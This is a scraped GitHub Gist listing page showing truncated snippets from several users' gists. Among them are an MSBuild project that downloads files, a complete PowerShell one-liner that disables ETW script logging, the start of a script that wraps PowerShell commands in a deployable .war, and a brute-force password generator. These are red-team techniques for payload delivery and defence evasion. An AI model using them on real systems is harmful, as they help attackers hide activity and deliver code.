Skip to content

Instantly share code, notes, and snippets.

Avatar

Steve Borosh rvrsh3ll

View GitHub Profile
@bytecod3r
bytecod3r / msbuildapicaller.csproj
Created Jan 20, 2020
msbuildapicaller.csproj
View msbuildapicaller.csproj
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<UsingTask TaskName="DownloadFile" TaskFactory="CodeTaskFactory" AssemblyFile="$(MSBuildToolsPath)\Microsoft.Build.Tasks.v4.0.dll">
<ParameterGroup>
<Address ParameterType="System.String" Required="true" />
<FileName ParameterType="System.String" Required="true" />
</ParameterGroup>
<Task>
<Reference Include="System" />
<Code Type="Fragment" Language="cs"><![CDATA[new System.Net.WebClient().DownloadFile(Address, FileName);]]></Code>
@joelallouz
joelallouz / grin-miner-setup.txt
Created Jan 4, 2019
Grin miner install on Ubuntu 18.04.1 LTS Server - Cuda Setup
View grin-miner-setup.txt
### Install, build and RUN Grin — Then stop it
## install rust and dependencies
curl https://sh.rustup.rs -sSf | sh; source $HOME/.cargo/env
sudo apt install build-essential cmake git libgit2-dev clang libncurses5-dev libncursesw5-dev zlib1g-dev pkg-config libssl-dev llvm
## pull grin
git clone https://github.com/mimblewimble/grin.git
cd grin
cargo build --release
@tandasat
tandasat / KillETW.ps1
Last active Apr 19, 2022
Disable ETW of the current PowerShell session
View KillETW.ps1
#
# This PowerShell command sets 0 to System.Management.Automation.Tracing.PSEtwLogProvider etwProvider.m_enabled
# which effectively disables Suspicious ScriptBlock Logging etc. Note that this command itself does not attempt
# to bypass Suspicious ScriptBlock Logging for readability.
#
[Reflection.Assembly]::LoadWithPartialName('System.Core').GetType('System.Diagnostics.Eventing.EventProvider').GetField('m_enabled','NonPublic,Instance').SetValue([Ref].Assembly.GetType('System.Management.Automation.Tracing.PSEtwLogProvider').GetField('etwProvider','NonPublic,Static').GetValue($null),0)
@DCSantu2000
DCSantu2000 / pyBtuteForceIter.py
Created Nov 15, 2016
Python Brute Force Using Itertools Library.It allows you to make password library.This code helps you to make a password from (0 to zzzzzzzzzzzzzzzzzzzz).
View pyBtuteForceIter.py
###################Details#########
#A simple python brute force algarithm
#using itertools library.
#####################################
#_author_="Antu Roy"
#_year_=2015
########imports##########
View psWar.py
#!/usr/bin/python
# Code that quickly generates a deployable .war for a PowerShell one-liner
import zipfile
import StringIO
import sys
def generatePsWar(psCmd, appName):